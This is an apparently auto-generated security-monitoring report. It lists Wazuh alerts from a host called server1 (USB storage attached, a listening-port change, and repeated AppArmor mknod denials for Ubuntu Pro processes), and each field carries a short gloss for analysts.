SOCscribe - Alert Report

Attached USB Storage

🧠 What happened? Attached USB Storage

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:22:00.185+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:22:00.185+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Attached USB Storage
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  81101
Numeric ID of the detection rule that fired.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['usb']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gpg13:  ['4.8']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533320.0
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24T22:21:59.791313+00:00 server1 kernel: usb 2-2.1: New USB device found, idVendor=0e0f, idProduct=0008, bcdDevice= 1.00
The complete raw log message before parsing – last‑resort truth for deep dives.

predecoder.program_name:  kernel
Process that originally wrote the log line (e.g., sshd, sudo).

predecoder.timestamp:  2025-04-24T22:21:59.791313+00:00
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

decoder.parent:  kernel
Parent decoder used – for nested parsing.

decoder.name:  kernel
Name of the Wazuh decoder that parsed this raw log.

data.id:  usb
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  /var/log/kern.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Attached USB Storage

🧠 What happened? Attached USB Storage

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:22:00.188+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:22:00.188+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Attached USB Storage
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  81101
Numeric ID of the detection rule that fired.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['usb']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gpg13:  ['4.8']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533320.266
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24T22:21:59.791313+00:00 server1 kernel: usb 2-2.1: New USB device found, idVendor=0e0f, idProduct=0008, bcdDevice= 1.00
The complete raw log message before parsing – last‑resort truth for deep dives.

predecoder.program_name:  kernel
Process that originally wrote the log line (e.g., sshd, sudo).

predecoder.timestamp:  2025-04-24T22:21:59.791313+00:00
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

decoder.parent:  kernel
Parent decoder used – for nested parsing.

decoder.name:  kernel
Name of the Wazuh decoder that parsed this raw log.

data.id:  usb
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  /var/log/syslog
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Listened ports status (netstat) changed (new port opened or closed).

🧠 What happened? Listened ports status (netstat) changed (new port opened or closed).

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:22:00.621+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:22:00.621+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Listened ports status (netstat) changed (new port opened or closed).
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  533
Numeric ID of the detection rule that fired.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['ossec']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.2.7', '10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['10.1']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.14', 'AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533320.532
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

previous_output:  Previous output: ossec: output: 'netstat listening ports': tcp6 :::22 :::* 1/systemd tcp 127.0.0.53:53 0.0.0.0:* 4398/systemd-resolv tcp 127.0.0.54:53 0.0.0.0:* 4398/systemd-resolv udp 127.0.0.53:53 0.0.0.0:* 4398/systemd-resolv udp 127.0.0.54:53 0.0.0.0:* 4398/systemd-resolv tcp 0.0.0.0:443 0.0.0.0:* 62808/node tcp 0.0.0.0:1514 0.0.0.0:* 60647/wazuh-remoted tcp 0.0.0.0:1515 0.0.0.0:* 60521/wazuh-authd tcp6 127.0.0.1:9200 :::* 16883/java tcp6 127.0.0.1:9300 :::* 16883/java tcp 0.0.0.0:55000 0.0.0.0:* 60481/python3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

full_log:  ossec: output: 'netstat listening ports': tcp6 :::22 :::* 1/systemd tcp 127.0.0.53:53 0.0.0.0:* 4398/systemd-resolv tcp 127.0.0.54:53 0.0.0.0:* 4398/systemd-resolv udp 127.0.0.53:53 0.0.0.0:* 4398/systemd-resolv udp 127.0.0.54:53 0.0.0.0:* 4398/systemd-resolv udp 192.168.6.137:68 0.0.0.0:* 4024/systemd-networ tcp 0.0.0.0:443 0.0.0.0:* 62808/node tcp 0.0.0.0:1514 0.0.0.0:* 60647/wazuh-remoted tcp 0.0.0.0:1515 0.0.0.0:* 60521/wazuh-authd tcp6 127.0.0.1:9200 :::* 16883/java tcp6 127.0.0.1:9300 :::* 16883/java tcp 0.0.0.0:55000 0.0.0.0:* 60481/python3
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  ossec
Name of the Wazuh decoder that parsed this raw log.

previous_log:  ossec: output: 'netstat listening ports': tcp6 :::22 :::* 1/systemd tcp 127.0.0.53:53 0.0.0.0:* 4398/systemd-resolv tcp 127.0.0.54:53 0.0.0.0:* 4398/systemd-resolv udp 127.0.0.53:53 0.0.0.0:* 4398/systemd-resolv udp 127.0.0.54:53 0.0.0.0:* 4398/systemd-resolv tcp 0.0.0.0:443 0.0.0.0:* 62808/node tcp 0.0.0.0:1514 0.0.0.0:* 60647/wazuh-remoted tcp 0.0.0.0:1515 0.0.0.0:* 60521/wazuh-authd tcp6 127.0.0.1:9200 :::* 16883/java tcp6 127.0.0.1:9300 :::* 16883/java tcp 0.0.0.0:55000 0.0.0.0:* 60481/python3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  netstat listening ports
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Apparmor DENIED mknod operation.

🧠 What happened? Apparmor DENIED mknod operation.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:22:02.623+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:22:02.623+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  4
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Apparmor DENIED mknod operation.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  52004
Numeric ID of the detection rule that fired.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['local', 'syslog', 'apparmor']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.2.7', '10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.14', 'AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533322.1926
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24T22:22:02.440199+00:00 server1 kernel: audit: type=1400 audit(1745533322.436:1021): apparmor="DENIED" operation="mknod" class="file" profile="ubuntu_pro_esm_cache" name="/usr/lib/python3/dist-packages/uaclient/__pycache__/__init__.cpython-312.pyc.124504254074288" pid=76917 comm="python3" requested_mask="c" denied_mask="c" fsuid=0 ouid=0
The complete raw log message before parsing – last‑resort truth for deep dives.

predecoder.program_name:  kernel
Process that originally wrote the log line (e.g., sshd, sudo).

predecoder.timestamp:  2025-04-24T22:22:02.440199+00:00
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

decoder.parent:  kernel
Parent decoder used – for nested parsing.

decoder.name:  kernel
Name of the Wazuh decoder that parsed this raw log.

data.status:  DENIED
Result status (success / failure). Quick win to see brute force vs success.

data.extra_data:  mknod
Raw extra block – drill in if the summary is unclear.

location:  /var/log/syslog
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  4
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Apparmor DENIED mknod operation.

🧠 What happened? Apparmor DENIED mknod operation.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:22:02.624+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:22:02.624+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  4
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Apparmor DENIED mknod operation.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  52004
Numeric ID of the detection rule that fired.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['local', 'syslog', 'apparmor']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.2.7', '10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.14', 'AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533322.2559
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24T22:22:02.448985+00:00 server1 kernel: audit: type=1400 audit(1745533322.445:1022): apparmor="DENIED" operation="mknod" class="file" profile="ubuntu_pro_esm_cache" name="/usr/lib/python3/dist-packages/uaclient/__pycache__/log.cpython-312.pyc.124504258771216" pid=76917 comm="python3" requested_mask="c" denied_mask="c" fsuid=0 ouid=0
The complete raw log message before parsing – last‑resort truth for deep dives.

predecoder.program_name:  kernel
Process that originally wrote the log line (e.g., sshd, sudo).

predecoder.timestamp:  2025-04-24T22:22:02.448985+00:00
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

decoder.parent:  kernel
Parent decoder used – for nested parsing.

decoder.name:  kernel
Name of the Wazuh decoder that parsed this raw log.

data.status:  DENIED
Result status (success / failure). Quick win to see brute force vs success.

data.extra_data:  mknod
Raw extra block – drill in if the summary is unclear.

location:  /var/log/syslog
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  4
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Apparmor DENIED mknod operation.

🧠 What happened? Apparmor DENIED mknod operation.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:22:02.624+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:22:02.624+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  4
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Apparmor DENIED mknod operation.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  52004
Numeric ID of the detection rule that fired.

rule.firedtimes:  4
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['local', 'syslog', 'apparmor']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.2.7', '10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.14', 'AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533322.3187
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24T22:22:02.473370+00:00 server1 kernel: audit: type=1400 audit(1745533322.471:1024): apparmor="DENIED" operation="mknod" class="file" profile="ubuntu_pro_esm_cache" name="/usr/lib/python3/dist-packages/uaclient/__pycache__/secret_manager.cpython-312.pyc.124504252962736" pid=76917 comm="python3" requested_mask="c" denied_mask="c" fsuid=0 ouid=0
The complete raw log message before parsing – last‑resort truth for deep dives.

predecoder.program_name:  kernel
Process that originally wrote the log line (e.g., sshd, sudo).

predecoder.timestamp:  2025-04-24T22:22:02.473370+00:00
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

decoder.parent:  kernel
Parent decoder used – for nested parsing.

decoder.name:  kernel
Name of the Wazuh decoder that parsed this raw log.

data.status:  DENIED
Result status (success / failure). Quick win to see brute force vs success.

data.extra_data:  mknod
Raw extra block – drill in if the summary is unclear.

location:  /var/log/syslog
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  4
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Apparmor DENIED mknod operation.

🧠 What happened? Apparmor DENIED mknod operation.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:22:02.624+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:22:02.624+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  4
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Apparmor DENIED mknod operation.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  52004
Numeric ID of the detection rule that fired.

rule.firedtimes:  3
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['local', 'syslog', 'apparmor']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.2.7', '10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.14', 'AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533322.3826
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24T22:22:02.470997+00:00 server1 kernel: audit: type=1400 audit(1745533322.469:1023): apparmor="DENIED" operation="mknod" class="file" profile="ubuntu_pro_esm_cache" name="/usr/lib/python3/dist-packages/uaclient/__pycache__/defaults.cpython-312.pyc.124504252962736" pid=76917 comm="python3" requested_mask="c" denied_mask="c" fsuid=0 ouid=0
The complete raw log message before parsing – last‑resort truth for deep dives.

predecoder.program_name:  kernel
Process that originally wrote the log line (e.g., sshd, sudo).

predecoder.timestamp:  2025-04-24T22:22:02.470997+00:00
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

decoder.parent:  kernel
Parent decoder used – for nested parsing.

decoder.name:  kernel
Name of the Wazuh decoder that parsed this raw log.

data.status:  DENIED
Result status (success / failure). Quick win to see brute force vs success.

data.extra_data:  mknod
Raw extra block – drill in if the summary is unclear.

location:  /var/log/syslog
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  4
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Apparmor DENIED mknod operation.

🧠 What happened? Apparmor DENIED mknod operation.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:22:02.624+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:22:02.624+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  4
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Apparmor DENIED mknod operation.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  52004
Numeric ID of the detection rule that fired.

rule.firedtimes:  5
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['local', 'syslog', 'apparmor']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.2.7', '10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.14', 'AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533322.4459
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24T22:22:02.495638+00:00 server1 kernel: audit: type=1400 audit(1745533322.493:1025): apparmor="DENIED" operation="mknod" class="file" profile="ubuntu_pro_apt_news" name="/usr/lib/python3/dist-packages/uaclient/__pycache__/__init__.cpython-312.pyc.132628381628208" pid=76916 comm="python3" requested_mask="c" denied_mask="c" fsuid=0 ouid=0
The complete raw log message before parsing – last‑resort truth for deep dives.

predecoder.program_name:  kernel
Process that originally wrote the log line (e.g., sshd, sudo).

predecoder.timestamp:  2025-04-24T22:22:02.495638+00:00
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

decoder.parent:  kernel
Parent decoder used – for nested parsing.

decoder.name:  kernel
Name of the Wazuh decoder that parsed this raw log.

data.status:  DENIED
Result status (success / failure). Quick win to see brute force vs success.

data.extra_data:  mknod
Raw extra block – drill in if the summary is unclear.

location:  /var/log/syslog
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Apparmor DENIED mknod operation.

🧠 What happened? Apparmor DENIED mknod operation.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:22:02.624+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:22:02.624+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  4
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Apparmor DENIED mknod operation.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  52004
Numeric ID of the detection rule that fired.

rule.firedtimes:  6
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['local', 'syslog', 'apparmor']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.2.7', '10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.14', 'AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533322.5091
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24T22:22:02.508884+00:00 server1 kernel: audit: type=1400 audit(1745533322.503:1026): apparmor="DENIED" operation="mknod" class="file" profile="ubuntu_pro_esm_cache" name="/usr/lib/python3/dist-packages/uaclient/__pycache__/system.cpython-312.pyc.124504252964784" pid=76917 comm="python3" requested_mask="c" denied_mask="c" fsuid=0 ouid=0
The complete raw log message before parsing – last‑resort truth for deep dives.

predecoder.program_name:  kernel
Process that originally wrote the log line (e.g., sshd, sudo).

predecoder.timestamp:  2025-04-24T22:22:02.508884+00:00
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

decoder.parent:  kernel
Parent decoder used – for nested parsing.

decoder.name:  kernel
Name of the Wazuh decoder that parsed this raw log.

data.status:  DENIED
Result status (success / failure). Quick win to see brute force vs success.

data.extra_data:  mknod
Raw extra block – drill in if the summary is unclear.

location:  /var/log/syslog
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Apparmor DENIED mknod operation.

🧠 What happened? Apparmor DENIED mknod operation.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:22:02.624+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:22:02.624+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  4
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Apparmor DENIED mknod operation.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  52004
Numeric ID of the detection rule that fired.

rule.firedtimes:  8
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['local', 'syslog', 'apparmor']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.2.7', '10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.14', 'AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533322.5722
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24T22:22:02.572878+00:00 server1 kernel: audit: type=1400 audit(1745533322.569:1029): apparmor="DENIED" operation="mknod" class="file" profile="ubuntu_pro_esm_cache" name="/usr/lib/python3/dist-packages/uaclient/messages/__pycache__/__init__.cpython-312.pyc.124504252186160" pid=76917 comm="python3" requested_mask="c" denied_mask="c" fsuid=0 ouid=0
The complete raw log message before parsing – last‑resort truth for deep dives.

predecoder.program_name:  kernel
Process that originally wrote the log line (e.g., sshd, sudo).

predecoder.timestamp:  2025-04-24T22:22:02.572878+00:00
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

decoder.parent:  kernel
Parent decoder used – for nested parsing.

decoder.name:  kernel
Name of the Wazuh decoder that parsed this raw log.

data.status:  DENIED
Result status (success / failure). Quick win to see brute force vs success.

data.extra_data:  mknod
Raw extra block – drill in if the summary is unclear.

location:  /var/log/syslog
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Apparmor DENIED mknod operation.

🧠 What happened? Apparmor DENIED mknod operation.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:22:02.624+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:22:02.624+0000
